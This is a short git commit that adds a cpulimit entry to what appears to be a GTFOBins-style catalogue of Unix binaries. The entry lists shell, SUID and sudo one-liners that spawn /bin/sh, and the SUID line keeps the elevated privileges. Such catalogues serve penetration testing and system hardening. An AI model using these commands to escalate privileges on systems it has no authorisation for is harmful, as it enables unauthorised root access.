Add cpulimit SUID

This commit is contained in:
AssassinUKG 2021-02-27 11:06:40 +00:00 committed by GitHub
parent eca7899007
commit c20963cfd6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2,6 +2,8 @@
functions:
shell:
- code: cpulimit -l 100 -f /bin/sh
suid:
- code: ./cpulimit -l 100 -f -- /bin/sh -p
sudo:
- code: sudo cpulimit -l 100 -f /bin/sh
---